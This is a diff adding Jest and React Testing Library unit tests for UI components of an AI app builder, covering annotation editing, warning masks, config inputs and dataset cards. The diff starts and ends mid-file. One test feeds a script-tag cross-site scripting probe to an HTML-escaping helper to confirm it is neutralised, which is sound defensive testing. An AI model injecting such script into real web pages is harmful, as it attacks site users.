await user.clear(textarea)
await user.type(textarea, 'New content')
// Rerender with new content prop
rerender(<EditItem {...defaultProps} content="Updated content" />)
// Assert - Textarea value should be reset due to useEffect
expect(textarea).toHaveValue('')
})
it('should preserve edit state across content changes', async () => {
// Arrange
const { rerender } = render(<EditItem {...defaultProps} />)
const user = userEvent.setup()
// Act - Enter edit mode
await user.click(screen.getByText('common.operation.edit'))
// Rerender with new content
rerender(<EditItem {...defaultProps} content="Updated content" />)
// Assert - Should still be in edit mode
expect(screen.getByRole('textbox')).toBeInTheDocument()
})
})
// Edge Cases (REQUIRED)
describe('Edge Cases', () => {
it('should handle empty content', () => {
// Arrange
const props = {
...defaultProps,
content: '',
}
// Act
const { container } = render(<EditItem {...props} />)
// Assert - Should render without crashing
// Check that the component renders properly with empty content
expect(container.querySelector('.grow')).toBeInTheDocument()
// Should still show edit button
expect(screen.getByText('common.operation.edit')).toBeInTheDocument()
})
it('should handle very long content', () => {
// Arrange
const longContent = 'A'.repeat(1000)
const props = {
...defaultProps,
content: longContent,
}
// Act
render(<EditItem {...props} />)
// Assert
expect(screen.getByText(longContent)).toBeInTheDocument()
})
it('should handle content with special characters', () => {
// Arrange
const specialContent = 'Content with & < > " \' characters'
const props = {
...defaultProps,
content: specialContent,
}
// Act
render(<EditItem {...props} />)
// Assert
expect(screen.getByText(specialContent)).toBeInTheDocument()
})
it('should handle rapid edit/cancel operations', async () => {
// Arrange
const props = { ...defaultProps }
const user = userEvent.setup()
// Act
render(<EditItem {...props} />)
// Rapid edit/cancel operations
await user.click(screen.getByText('common.operation.edit'))
await user.click(screen.getByText('common.operation.cancel'))
await user.click(screen.getByText('common.operation.edit'))
await user.click(screen.getByText('common.operation.cancel'))
// Assert
expect(screen.queryByRole('textbox')).not.toBeInTheDocument()
expect(screen.getByText('Test content')).toBeInTheDocument()
})
})
})

View File

@ -0,0 +1,408 @@
import { render, screen } from '@testing-library/react'
import userEvent from '@testing-library/user-event'
import Toast, { type IToastProps, type ToastHandle } from '@/app/components/base/toast'
import EditAnnotationModal from './index'
// Mock only external dependencies
jest.mock('@/service/annotation', () => ({
addAnnotation: jest.fn(),
editAnnotation: jest.fn(),
}))
jest.mock('@/context/provider-context', () => ({
useProviderContext: () => ({
plan: {
usage: { annotatedResponse: 5 },
total: { annotatedResponse: 10 },
},
enableBilling: true,
}),
}))
jest.mock('@/hooks/use-timestamp', () => ({
__esModule: true,
default: () => ({
formatTime: () => '2023-12-01 10:30:00',
}),
}))
// Note: i18n is automatically mocked by Jest via __mocks__/react-i18next.ts
jest.mock('@/app/components/billing/annotation-full', () => ({
__esModule: true,
default: () => <div data-testid="annotation-full" />,
}))
type ToastNotifyProps = Pick<IToastProps, 'type' | 'size' | 'message' | 'duration' | 'className' | 'customComponent' | 'onClose'>
type ToastWithNotify = typeof Toast & { notify: (props: ToastNotifyProps) => ToastHandle }
const toastWithNotify = Toast as unknown as ToastWithNotify
const toastNotifySpy = jest.spyOn(toastWithNotify, 'notify').mockReturnValue({ clear: jest.fn() })
const { addAnnotation: mockAddAnnotation, editAnnotation: mockEditAnnotation } = jest.requireMock('@/service/annotation') as {
addAnnotation: jest.Mock
editAnnotation: jest.Mock
}
describe('EditAnnotationModal', () => {
const defaultProps = {
isShow: true,
onHide: jest.fn(),
appId: 'test-app-id',
query: 'Test query',
answer: 'Test answer',
onEdited: jest.fn(),
onAdded: jest.fn(),
onRemove: jest.fn(),
}
afterAll(() => {
toastNotifySpy.mockRestore()
})
beforeEach(() => {
jest.clearAllMocks()
mockAddAnnotation.mockResolvedValue({
id: 'test-id',
account: { name: 'Test User' },
})
mockEditAnnotation.mockResolvedValue({})
})
// Rendering tests (REQUIRED)
describe('Rendering', () => {
it('should render modal when isShow is true', () => {
// Arrange
const props = { ...defaultProps }
// Act
render(<EditAnnotationModal {...props} />)
// Assert - Check for modal title as it appears in the mock
expect(screen.getByText('appAnnotation.editModal.title')).toBeInTheDocument()
})
it('should not render modal when isShow is false', () => {
// Arrange
const props = { ...defaultProps, isShow: false }
// Act
render(<EditAnnotationModal {...props} />)
// Assert
expect(screen.queryByText('appAnnotation.editModal.title')).not.toBeInTheDocument()
})
it('should display query and answer sections', () => {
// Arrange
const props = { ...defaultProps }
// Act
render(<EditAnnotationModal {...props} />)
// Assert - Look for query and answer content
expect(screen.getByText('Test query')).toBeInTheDocument()
expect(screen.getByText('Test answer')).toBeInTheDocument()
})
})
// Props tests (REQUIRED)
describe('Props', () => {
it('should handle different query and answer content', () => {
// Arrange
const props = {
...defaultProps,
query: 'Custom query content',
answer: 'Custom answer content',
}
// Act
render(<EditAnnotationModal {...props} />)
// Assert - Check content is displayed
expect(screen.getByText('Custom query content')).toBeInTheDocument()
expect(screen.getByText('Custom answer content')).toBeInTheDocument()
})
it('should show remove option when annotationId is provided', () => {
// Arrange
const props = {
...defaultProps,
annotationId: 'test-annotation-id',
}
// Act
render(<EditAnnotationModal {...props} />)
// Assert - Remove option should be present (using pattern)
expect(screen.getByText('appAnnotation.editModal.removeThisCache')).toBeInTheDocument()
})
})
// User Interactions
describe('User Interactions', () => {
it('should enable editing for query and answer sections', () => {
// Arrange
const props = { ...defaultProps }
// Act
render(<EditAnnotationModal {...props} />)
// Assert - Edit links should be visible (using text content)
const editLinks = screen.getAllByText(/common\.operation\.edit/i)
expect(editLinks).toHaveLength(2)
})
it('should show remove option when annotationId is provided', () => {
// Arrange
const props = {
...defaultProps,
annotationId: 'test-annotation-id',
}
// Act
render(<EditAnnotationModal {...props} />)
// Assert
expect(screen.getByText('appAnnotation.editModal.removeThisCache')).toBeInTheDocument()
})
it('should save content when edited', async () => {
// Arrange
const mockOnAdded = jest.fn()
const props = {
...defaultProps,
onAdded: mockOnAdded,
}
const user = userEvent.setup()
// Mock API response
mockAddAnnotation.mockResolvedValueOnce({
id: 'test-annotation-id',
account: { name: 'Test User' },
})
// Act
render(<EditAnnotationModal {...props} />)
// Find and click edit link for query
const editLinks = screen.getAllByText(/common\.operation\.edit/i)
await user.click(editLinks[0])
// Find textarea and enter new content
const textarea = screen.getByRole('textbox')
await user.clear(textarea)
await user.type(textarea, 'New query content')
// Click save button
const saveButton = screen.getByRole('button', { name: 'common.operation.save' })
await user.click(saveButton)
// Assert
expect(mockAddAnnotation).toHaveBeenCalledWith('test-app-id', {
question: 'New query content',
answer: 'Test answer',
message_id: undefined,
})
})
})
// API Calls
describe('API Calls', () => {
it('should call addAnnotation when saving new annotation', async () => {
// Arrange
const mockOnAdded = jest.fn()
const props = {
...defaultProps,
onAdded: mockOnAdded,
}
const user = userEvent.setup()
// Mock the API response
mockAddAnnotation.mockResolvedValueOnce({
id: 'test-annotation-id',
account: { name: 'Test User' },
})
// Act
render(<EditAnnotationModal {...props} />)
// Edit query content
const editLinks = screen.getAllByText(/common\.operation\.edit/i)
await user.click(editLinks[0])
const textarea = screen.getByRole('textbox')
await user.clear(textarea)
await user.type(textarea, 'Updated query')
const saveButton = screen.getByRole('button', { name: 'common.operation.save' })
await user.click(saveButton)
// Assert
expect(mockAddAnnotation).toHaveBeenCalledWith('test-app-id', {
question: 'Updated query',
answer: 'Test answer',
message_id: undefined,
})
})
it('should call editAnnotation when updating existing annotation', async () => {
// Arrange
const mockOnEdited = jest.fn()
const props = {
...defaultProps,
annotationId: 'test-annotation-id',
messageId: 'test-message-id',
onEdited: mockOnEdited,
}
const user = userEvent.setup()
// Act
render(<EditAnnotationModal {...props} />)
// Edit query content
const editLinks = screen.getAllByText(/common\.operation\.edit/i)
await user.click(editLinks[0])
const textarea = screen.getByRole('textbox')
await user.clear(textarea)
await user.type(textarea, 'Modified query')
const saveButton = screen.getByRole('button', { name: 'common.operation.save' })
await user.click(saveButton)
// Assert
expect(mockEditAnnotation).toHaveBeenCalledWith(
'test-app-id',
'test-annotation-id',
{
message_id: 'test-message-id',
question: 'Modified query',
answer: 'Test answer',
},
)
})
})
// State Management
describe('State Management', () => {
it('should initialize with closed confirm modal', () => {
// Arrange
const props = { ...defaultProps }
// Act
render(<EditAnnotationModal {...props} />)
// Assert - Confirm dialog should not be visible initially
expect(screen.queryByText('appDebug.feature.annotation.removeConfirm')).not.toBeInTheDocument()
})
it('should show confirm modal when remove is clicked', async () => {
// Arrange
const props = {
...defaultProps,
annotationId: 'test-annotation-id',
}
const user = userEvent.setup()
// Act
render(<EditAnnotationModal {...props} />)
await user.click(screen.getByText('appAnnotation.editModal.removeThisCache'))
// Assert - Confirmation dialog should appear
expect(screen.getByText('appDebug.feature.annotation.removeConfirm')).toBeInTheDocument()
})
it('should call onRemove when removal is confirmed', async () => {
// Arrange
const mockOnRemove = jest.fn()
const props = {
...defaultProps,
annotationId: 'test-annotation-id',
onRemove: mockOnRemove,
}
const user = userEvent.setup()
// Act
render(<EditAnnotationModal {...props} />)
// Click remove
await user.click(screen.getByText('appAnnotation.editModal.removeThisCache'))
// Click confirm
const confirmButton = screen.getByRole('button', { name: 'common.operation.confirm' })
await user.click(confirmButton)
// Assert
expect(mockOnRemove).toHaveBeenCalled()
})
})
// Edge Cases (REQUIRED)
describe('Edge Cases', () => {
it('should handle empty query and answer', () => {
// Arrange
const props = {
...defaultProps,
query: '',
answer: '',
}
// Act
render(<EditAnnotationModal {...props} />)
// Assert
expect(screen.getByText('appAnnotation.editModal.title')).toBeInTheDocument()
})
it('should handle very long content', () => {
// Arrange
const longQuery = 'Q'.repeat(1000)
const longAnswer = 'A'.repeat(1000)
const props = {
...defaultProps,
query: longQuery,
answer: longAnswer,
}
// Act
render(<EditAnnotationModal {...props} />)
// Assert
expect(screen.getByText(longQuery)).toBeInTheDocument()
expect(screen.getByText(longAnswer)).toBeInTheDocument()
})
it('should handle special characters in content', () => {
// Arrange
const specialQuery = 'Query with & < > " \' characters'
const specialAnswer = 'Answer with & < > " \' characters'
const props = {
...defaultProps,
query: specialQuery,
answer: specialAnswer,
}
// Act
render(<EditAnnotationModal {...props} />)
// Assert
expect(screen.getByText(specialQuery)).toBeInTheDocument()
expect(screen.getByText(specialAnswer)).toBeInTheDocument()
})
it('should handle onlyEditResponse prop', () => {
// Arrange
const props = {
...defaultProps,
onlyEditResponse: true,
}
// Act
render(<EditAnnotationModal {...props} />)
// Assert - Query should be readonly, answer should be editable
const editLinks = screen.queryAllByText(/common\.operation\.edit/i)
expect(editLinks).toHaveLength(1) // Only answer should have edit button
})
})
})

View File

@ -0,0 +1,21 @@
import { render, screen } from '@testing-library/react'
import GroupName from './index'
describe('GroupName', () => {
beforeEach(() => {
jest.clearAllMocks()
})
describe('Rendering', () => {
it('should render name when provided', () => {
// Arrange
const title = 'Inputs'
// Act
render(<GroupName name={title} />)
// Assert
expect(screen.getByText(title)).toBeInTheDocument()
})
})
})

View File

@ -0,0 +1,70 @@
import { fireEvent, render, screen } from '@testing-library/react'
import OperationBtn from './index'
jest.mock('@remixicon/react', () => ({
RiAddLine: (props: { className?: string }) => (
<svg data-testid='add-icon' className={props.className} />
),
RiEditLine: (props: { className?: string }) => (
<svg data-testid='edit-icon' className={props.className} />
),
}))
describe('OperationBtn', () => {
beforeEach(() => {
jest.clearAllMocks()
})
// Rendering icons and translation labels
describe('Rendering', () => {
it('should render passed custom class when provided', () => {
// Arrange
const customClass = 'custom-class'
// Act
render(<OperationBtn type='add' className={customClass} />)
// Assert
expect(screen.getByText('common.operation.add').parentElement).toHaveClass(customClass)
})
it('should render add icon when type is add', () => {
// Arrange
const onClick = jest.fn()
// Act
render(<OperationBtn type='add' onClick={onClick} className='custom-class' />)
// Assert
expect(screen.getByTestId('add-icon')).toBeInTheDocument()
expect(screen.getByText('common.operation.add')).toBeInTheDocument()
})
it('should render edit icon when provided', () => {
// Arrange
const actionName = 'Rename'
// Act
render(<OperationBtn type='edit' actionName={actionName} />)
// Assert
expect(screen.getByTestId('edit-icon')).toBeInTheDocument()
expect(screen.queryByTestId('add-icon')).toBeNull()
expect(screen.getByText(actionName)).toBeInTheDocument()
})
})
// Click handling
describe('Interactions', () => {
it('should execute click handler when button is clicked', () => {
// Arrange
const onClick = jest.fn()
render(<OperationBtn type='add' onClick={onClick} />)
// Act
fireEvent.click(screen.getByText('common.operation.add'))
// Assert
expect(onClick).toHaveBeenCalledTimes(1)
})
})
})

View File

@ -0,0 +1,62 @@
import { render, screen } from '@testing-library/react'
import VarHighlight, { varHighlightHTML } from './index'
describe('VarHighlight', () => {
beforeEach(() => {
jest.clearAllMocks()
})
// Rendering highlighted variable tags
describe('Rendering', () => {
it('should render braces around the variable name with default styles', () => {
// Arrange
const props = { name: 'userInput' }
// Act
const { container } = render(<VarHighlight {...props} />)
// Assert
expect(screen.getByText('userInput')).toBeInTheDocument()
expect(screen.getAllByText('{{')[0]).toBeInTheDocument()
expect(screen.getAllByText('}}')[0]).toBeInTheDocument()
expect(container.firstChild).toHaveClass('item')
})
it('should apply custom class names when provided', () => {
// Arrange
const props = { name: 'custom', className: 'mt-2' }
// Act
const { container } = render(<VarHighlight {...props} />)
// Assert
expect(container.firstChild).toHaveClass('mt-2')
})
})
// Escaping HTML via helper
describe('varHighlightHTML', () => {
it('should escape dangerous characters before returning HTML string', () => {
// Arrange
const props = { name: '<script>alert(\'xss\')</script>' }
// Act
const html = varHighlightHTML(props)
// Assert
expect(html).toContain('&lt;script&gt;alert(&#39;xss&#39;)&lt;/script&gt;')
expect(html).not.toContain('<script>')
})
it('should include custom class names in the wrapper element', () => {
// Arrange
const props = { name: 'data', className: 'text-primary' }
// Act
const html = varHighlightHTML(props)
// Assert
expect(html).toContain('class="item text-primary')
})
})
})

View File

@ -0,0 +1,22 @@
import React from 'react'
import { fireEvent, render, screen } from '@testing-library/react'
import CannotQueryDataset from './cannot-query-dataset'
describe('CannotQueryDataset WarningMask', () => {
test('should render dataset warning copy and action button', () => {
const onConfirm = jest.fn()
render(<CannotQueryDataset onConfirm={onConfirm} />)
expect(screen.getByText('appDebug.feature.dataSet.queryVariable.unableToQueryDataSet')).toBeInTheDocument()
expect(screen.getByText('appDebug.feature.dataSet.queryVariable.unableToQueryDataSetTip')).toBeInTheDocument()
expect(screen.getByRole('button', { name: 'appDebug.feature.dataSet.queryVariable.ok' })).toBeInTheDocument()
})
test('should invoke onConfirm when OK button clicked', () => {
const onConfirm = jest.fn()
render(<CannotQueryDataset onConfirm={onConfirm} />)
fireEvent.click(screen.getByRole('button', { name: 'appDebug.feature.dataSet.queryVariable.ok' }))
expect(onConfirm).toHaveBeenCalledTimes(1)
})
})

View File

@ -0,0 +1,39 @@
import React from 'react'
import { fireEvent, render, screen } from '@testing-library/react'
import FormattingChanged from './formatting-changed'
describe('FormattingChanged WarningMask', () => {
test('should display translation text and both actions', () => {
const onConfirm = jest.fn()
const onCancel = jest.fn()
render(
<FormattingChanged
onConfirm={onConfirm}
onCancel={onCancel}
/>,
)
expect(screen.getByText('appDebug.formattingChangedTitle')).toBeInTheDocument()
expect(screen.getByText('appDebug.formattingChangedText')).toBeInTheDocument()
expect(screen.getByRole('button', { name: 'common.operation.cancel' })).toBeInTheDocument()
expect(screen.getByRole('button', { name: /common\.operation\.refresh/ })).toBeInTheDocument()
})
test('should call callbacks when buttons are clicked', () => {
const onConfirm = jest.fn()
const onCancel = jest.fn()
render(
<FormattingChanged
onConfirm={onConfirm}
onCancel={onCancel}
/>,
)
fireEvent.click(screen.getByRole('button', { name: /common\.operation\.refresh/ }))
fireEvent.click(screen.getByRole('button', { name: 'common.operation.cancel' }))
expect(onConfirm).toHaveBeenCalledTimes(1)
expect(onCancel).toHaveBeenCalledTimes(1)
})
})

View File

@ -0,0 +1,26 @@
import React from 'react'
import { fireEvent, render, screen } from '@testing-library/react'
import HasNotSetAPI from './has-not-set-api'
describe('HasNotSetAPI WarningMask', () => {
test('should show default title when trial not finished', () => {
render(<HasNotSetAPI isTrailFinished={false} onSetting={jest.fn()} />)
expect(screen.getByText('appDebug.notSetAPIKey.title')).toBeInTheDocument()
expect(screen.getByText('appDebug.notSetAPIKey.description')).toBeInTheDocument()
})
test('should show trail finished title when flag is true', () => {
render(<HasNotSetAPI isTrailFinished onSetting={jest.fn()} />)
expect(screen.getByText('appDebug.notSetAPIKey.trailFinished')).toBeInTheDocument()
})
test('should call onSetting when primary button clicked', () => {
const onSetting = jest.fn()
render(<HasNotSetAPI isTrailFinished={false} onSetting={onSetting} />)
fireEvent.click(screen.getByRole('button', { name: 'appDebug.notSetAPIKey.settingBtn' }))
expect(onSetting).toHaveBeenCalledTimes(1)
})
})

View File

@ -0,0 +1,25 @@
import React from 'react'
import { render, screen } from '@testing-library/react'
import WarningMask from './index'
describe('WarningMask', () => {
// Rendering of title, description, and footer content
describe('Rendering', () => {
test('should display provided title, description, and footer node', () => {
const footer = <button type="button">Retry</button>
// Arrange
render(
<WarningMask
title="Access Restricted"
description="Only workspace owners may modify this section."
footer={footer}
/>,
)
// Assert
expect(screen.getByText('Access Restricted')).toBeInTheDocument()
expect(screen.getByText('Only workspace owners may modify this section.')).toBeInTheDocument()
expect(screen.getByRole('button', { name: 'Retry' })).toBeInTheDocument()
})
})
})

View File

@ -2,12 +2,6 @@ import React from 'react'
import { fireEvent, render, screen } from '@testing-library/react'
import ConfirmAddVar from './index'
jest.mock('react-i18next', () => ({
useTranslation: () => ({
t: (key: string) => key,
}),
}))
jest.mock('../../base/var-highlight', () => ({
__esModule: true,
default: ({ name }: { name: string }) => <span data-testid="var-highlight">{name}</span>,

View File

@ -3,12 +3,6 @@ import { fireEvent, render, screen } from '@testing-library/react'
import EditModal from './edit-modal'
import type { ConversationHistoriesRole } from '@/models/debug'
jest.mock('react-i18next', () => ({
useTranslation: () => ({
t: (key: string) => key,
}),
}))
jest.mock('@/app/components/base/modal', () => ({
__esModule: true,
default: ({ children }: { children: React.ReactNode }) => <div>{children}</div>,

View File

@ -2,12 +2,6 @@ import React from 'react'
import { render, screen } from '@testing-library/react'
import HistoryPanel from './history-panel'
jest.mock('react-i18next', () => ({
useTranslation: () => ({
t: (key: string) => key,
}),
}))
const mockDocLink = jest.fn(() => 'doc-link')
jest.mock('@/context/i18n', () => ({
useDocLink: () => mockDocLink,

View File

@ -6,12 +6,6 @@ import { MAX_PROMPT_MESSAGE_LENGTH } from '@/config'
import { type PromptItem, PromptRole, type PromptVariable } from '@/models/debug'
import { AppModeEnum, ModelModeType } from '@/types/app'
jest.mock('react-i18next', () => ({
useTranslation: () => ({
t: (key: string) => key,
}),
}))
type DebugConfiguration = {
isAdvancedMode: boolean
currentAdvancedPrompt: PromptItem | PromptItem[]

View File

@ -5,12 +5,6 @@ jest.mock('react-sortablejs', () => ({
ReactSortable: ({ children }: { children: React.ReactNode }) => <div>{children}</div>,
}))
jest.mock('react-i18next', () => ({
useTranslation: () => ({
t: (key: string) => key,
}),
}))
describe('ConfigSelect Component', () => {
const defaultProps = {
options: ['Option 1', 'Option 2'],

View File

@ -0,0 +1,121 @@
import { fireEvent, render, screen, waitFor } from '@testing-library/react'
import ConfigString, { type IConfigStringProps } from './index'
const renderConfigString = (props?: Partial<IConfigStringProps>) => {
const onChange = jest.fn()
const defaultProps: IConfigStringProps = {
value: 5,
maxLength: 10,
modelId: 'model-id',
onChange,
}
render(<ConfigString {...defaultProps} {...props} />)
return { onChange }
}
describe('ConfigString', () => {
beforeEach(() => {
jest.clearAllMocks()
})
describe('Rendering', () => {
it('should render numeric input with bounds', () => {
renderConfigString({ value: 3, maxLength: 8 })
const input = screen.getByRole('spinbutton')
expect(input).toHaveValue(3)
expect(input).toHaveAttribute('min', '1')
expect(input).toHaveAttribute('max', '8')
})
it('should render empty input when value is undefined', () => {
const { onChange } = renderConfigString({ value: undefined })
expect(screen.getByRole('spinbutton')).toHaveValue(null)
expect(onChange).not.toHaveBeenCalled()
})
})
describe('Effect behavior', () => {
it('should clamp initial value to maxLength when it exceeds limit', async () => {
const onChange = jest.fn()
render(
<ConfigString
value={15}
maxLength={10}
modelId="model-id"
onChange={onChange}
/>,
)
await waitFor(() => {
expect(onChange).toHaveBeenCalledWith(10)
})
expect(onChange).toHaveBeenCalledTimes(1)
})
it('should clamp when updated prop value exceeds maxLength', async () => {
const onChange = jest.fn()
const { rerender } = render(
<ConfigString
value={4}
maxLength={6}
modelId="model-id"
onChange={onChange}
/>,
)
rerender(
<ConfigString
value={9}
maxLength={6}
modelId="model-id"
onChange={onChange}
/>,
)
await waitFor(() => {
expect(onChange).toHaveBeenCalledWith(6)
})
expect(onChange).toHaveBeenCalledTimes(1)
})
})
describe('User interactions', () => {
it('should clamp entered value above maxLength', () => {
const { onChange } = renderConfigString({ maxLength: 7 })
fireEvent.change(screen.getByRole('spinbutton'), { target: { value: '12' } })
expect(onChange).toHaveBeenCalledWith(7)
})
it('should raise value below minimum to one', () => {
const { onChange } = renderConfigString()
fireEvent.change(screen.getByRole('spinbutton'), { target: { value: '0' } })
expect(onChange).toHaveBeenCalledWith(1)
})
it('should forward parsed value when within bounds', () => {
const { onChange } = renderConfigString({ maxLength: 9 })
fireEvent.change(screen.getByRole('spinbutton'), { target: { value: '7' } })
expect(onChange).toHaveBeenCalledWith(7)
})
it('should pass through NaN when input is cleared', () => {
const { onChange } = renderConfigString()
fireEvent.change(screen.getByRole('spinbutton'), { target: { value: '' } })
expect(onChange).toHaveBeenCalledTimes(1)
expect(onChange.mock.calls[0][0]).toBeNaN()
})
})
})

View File

@ -0,0 +1,45 @@
import React from 'react'
import { fireEvent, render, screen } from '@testing-library/react'
import SelectTypeItem from './index'
import { InputVarType } from '@/app/components/workflow/types'
describe('SelectTypeItem', () => {
// Rendering pathways based on type and selection state
describe('Rendering', () => {
test('should render the type label and icon', () => {
// Arrange
const { container } = render(
<SelectTypeItem
type={InputVarType.textInput}
selected={false}
onClick={jest.fn()}
/>,
)
// Assert
expect(screen.getByText('appDebug.variableConfig.text-input')).toBeInTheDocument()
expect(container.querySelector('svg')).not.toBeNull()
})
})
// User interaction outcomes
describe('Interactions', () => {
test('should trigger onClick when item is pressed', () => {
const handleClick = jest.fn()
// Arrange
render(
<SelectTypeItem
type={InputVarType.paragraph}
selected={false}
onClick={handleClick}
/>,
)
// Act
fireEvent.click(screen.getByText('appDebug.variableConfig.paragraph'))
// Assert
expect(handleClick).toHaveBeenCalledTimes(1)
})
})
})

View File

@ -0,0 +1,42 @@
import { fireEvent, render, screen } from '@testing-library/react'
import ContrlBtnGroup from './index'
describe('ContrlBtnGroup', () => {
beforeEach(() => {
jest.clearAllMocks()
})
// Rendering fixed action buttons
describe('Rendering', () => {
it('should render buttons when rendered', () => {
// Arrange
const onSave = jest.fn()
const onReset = jest.fn()
// Act
render(<ContrlBtnGroup onSave={onSave} onReset={onReset} />)
// Assert
expect(screen.getByTestId('apply-btn')).toBeInTheDocument()
expect(screen.getByTestId('reset-btn')).toBeInTheDocument()
})
})
// Handling click interactions
describe('Interactions', () => {
it('should invoke callbacks when buttons are clicked', () => {
// Arrange
const onSave = jest.fn()
const onReset = jest.fn()
render(<ContrlBtnGroup onSave={onSave} onReset={onReset} />)
// Act
fireEvent.click(screen.getByTestId('apply-btn'))
fireEvent.click(screen.getByTestId('reset-btn'))
// Assert
expect(onSave).toHaveBeenCalledTimes(1)
expect(onReset).toHaveBeenCalledTimes(1)
})
})
})

View File

@ -15,8 +15,8 @@ const ContrlBtnGroup: FC<IContrlBtnGroupProps> = ({ onSave, onReset }) => {
return (
<div className="fixed bottom-0 left-[224px] h-[64px] w-[519px]">
<div className={`${s.ctrlBtn} flex h-full items-center gap-2 bg-white pl-4`}>
<Button variant='primary' onClick={onSave}>{t('appDebug.operation.applyConfig')}</Button>
<Button onClick={onReset}>{t('appDebug.operation.resetConfig')}</Button>
<Button variant='primary' onClick={onSave} data-testid="apply-btn">{t('appDebug.operation.applyConfig')}</Button>
<Button onClick={onReset} data-testid="reset-btn">{t('appDebug.operation.resetConfig')}</Button>
</div>
</div>
)

View File

@ -0,0 +1,242 @@
import { fireEvent, render, screen, waitFor, within } from '@testing-library/react'
import userEvent from '@testing-library/user-event'
import Item from './index'
import type React from 'react'
import type { DataSet } from '@/models/datasets'
import { ChunkingMode, DataSourceType, DatasetPermission } from '@/models/datasets'
import type { IndexingType } from '@/app/components/datasets/create/step-two'
import type { RetrievalConfig } from '@/types/app'
import { RETRIEVE_METHOD } from '@/types/app'
import useBreakpoints, { MediaType } from '@/hooks/use-breakpoints'
jest.mock('../settings-modal', () => ({
__esModule: true,
default: ({ onSave, onCancel, currentDataset }: any) => (
<div>
<div>Mock settings modal</div>
<button onClick={() => onSave({ ...currentDataset, name: 'Updated dataset' })}>Save changes</button>
<button onClick={onCancel}>Close</button>
</div>
),
}))
jest.mock('@/hooks/use-breakpoints', () => {
const actual = jest.requireActual('@/hooks/use-breakpoints')
return {
__esModule: true,
...actual,
default: jest.fn(() => actual.MediaType.pc),
}
})
const mockedUseBreakpoints = useBreakpoints as jest.MockedFunction<typeof useBreakpoints>
const baseRetrievalConfig: RetrievalConfig = {
search_method: RETRIEVE_METHOD.semantic,
reranking_enable: false,
reranking_model: {
reranking_provider_name: 'provider',
reranking_model_name: 'rerank-model',
},
top_k: 4,
score_threshold_enabled: false,
score_threshold: 0,
}
const defaultIndexingTechnique: IndexingType = 'high_quality' as IndexingType
const createDataset = (overrides: Partial<DataSet> = {}): DataSet => {
const {
retrieval_model,
retrieval_model_dict,
icon_info,
...restOverrides
} = overrides
const resolvedRetrievalModelDict = {
...baseRetrievalConfig,
...retrieval_model_dict,
}
const resolvedRetrievalModel = {
...baseRetrievalConfig,
...(retrieval_model ?? retrieval_model_dict),
}
const defaultIconInfo = {
icon: '📘',
icon_type: 'emoji',
icon_background: '#FFEAD5',
icon_url: '',
}
const resolvedIconInfo = ('icon_info' in overrides)
? icon_info
: defaultIconInfo
return {
id: 'dataset-id',
name: 'Dataset Name',
indexing_status: 'completed',
icon_info: resolvedIconInfo as DataSet['icon_info'],
description: 'A test dataset',
permission: DatasetPermission.onlyMe,
data_source_type: DataSourceType.FILE,
indexing_technique: defaultIndexingTechnique,
author_name: 'author',
created_by: 'creator',
updated_by: 'updater',
updated_at: 0,
app_count: 0,
doc_form: ChunkingMode.text,
document_count: 0,
total_document_count: 0,
total_available_documents: 0,
word_count: 0,
provider: 'dify',
embedding_model: 'text-embedding',
embedding_model_provider: 'openai',
embedding_available: true,
retrieval_model_dict: resolvedRetrievalModelDict,
retrieval_model: resolvedRetrievalModel,
tags: [],
external_knowledge_info: {
external_knowledge_id: 'external-id',
external_knowledge_api_id: 'api-id',
external_knowledge_api_name: 'api-name',
external_knowledge_api_endpoint: 'https://endpoint',
},
external_retrieval_model: {
top_k: 2,
score_threshold: 0.5,
score_threshold_enabled: true,
},
built_in_field_enabled: true,
doc_metadata: [],
keyword_number: 3,
pipeline_id: 'pipeline-id',
is_published: true,
runtime_mode: 'general',
enable_api: true,
is_multimodal: false,
...restOverrides,
}
}
const renderItem = (config: DataSet, props?: Partial<React.ComponentProps<typeof Item>>) => {
const onSave = jest.fn()
const onRemove = jest.fn()
render(
<Item
config={config}
onSave={onSave}
onRemove={onRemove}
{...props}
/>,
)
return { onSave, onRemove }
}
describe('dataset-config/card-item', () => {
beforeEach(() => {
jest.clearAllMocks()
mockedUseBreakpoints.mockReturnValue(MediaType.pc)
})
it('should render dataset details with indexing and external badges', () => {
const dataset = createDataset({
provider: 'external',
retrieval_model_dict: {
...baseRetrievalConfig,
search_method: RETRIEVE_METHOD.semantic,
},
})
renderItem(dataset)
const card = screen.getByText(dataset.name).closest('.group') as HTMLElement
const actionButtons = within(card).getAllByRole('button', { hidden: true })
expect(screen.getByText(dataset.name)).toBeInTheDocument()
expect(screen.getByText('dataset.indexingTechnique.high_quality · dataset.indexingMethod.semantic_search')).toBeInTheDocument()
expect(screen.getByText('dataset.externalTag')).toBeInTheDocument()
expect(actionButtons).toHaveLength(2)
})
it('should open settings drawer from edit action and close after saving', async () => {
const user = userEvent.setup()
const dataset = createDataset()
const { onSave } = renderItem(dataset)
const card = screen.getByText(dataset.name).closest('.group') as HTMLElement
const [editButton] = within(card).getAllByRole('button', { hidden: true })
await user.click(editButton)
expect(screen.getByText('Mock settings modal')).toBeInTheDocument()
await waitFor(() => {
expect(screen.getByRole('dialog')).toBeVisible()
})
await user.click(screen.getByText('Save changes'))
await waitFor(() => {
expect(onSave).toHaveBeenCalledWith(expect.objectContaining({ name: 'Updated dataset' }))
})
await waitFor(() => {
expect(screen.getByText('Mock settings modal')).not.toBeVisible()
})
})
it('should call onRemove and toggle destructive state on hover', async () => {
const user = userEvent.setup()
const dataset = createDataset()
const { onRemove } = renderItem(dataset)
const card = screen.getByText(dataset.name).closest('.group') as HTMLElement
const buttons = within(card).getAllByRole('button', { hidden: true })
const deleteButton = buttons[buttons.length - 1]
expect(deleteButton.className).not.toContain('action-btn-destructive')
fireEvent.mouseEnter(deleteButton)
expect(deleteButton.className).toContain('action-btn-destructive')
expect(card.className).toContain('border-state-destructive-border')
fireEvent.mouseLeave(deleteButton)
expect(deleteButton.className).not.toContain('action-btn-destructive')
await user.click(deleteButton)
expect(onRemove).toHaveBeenCalledWith(dataset.id)
})
it('should use default icon information when icon details are missing', () => {
const dataset = createDataset({ icon_info: undefined })
renderItem(dataset)
const nameElement = screen.getByText(dataset.name)
const iconElement = nameElement.parentElement?.firstElementChild as HTMLElement
expect(iconElement).toHaveStyle({ background: '#FFF4ED' })
expect(iconElement.querySelector('em-emoji')).toHaveAttribute('id', '📙')
})
it('should apply mask overlay on mobile when drawer is open', async () => {
mockedUseBreakpoints.mockReturnValue(MediaType.mobile)
const user = userEvent.setup()
const dataset = createDataset()
renderItem(dataset)
const card = screen.getByText(dataset.name).closest('.group') as HTMLElement
const [editButton] = within(card).getAllByRole('button', { hidden: true })
await user.click(editButton)
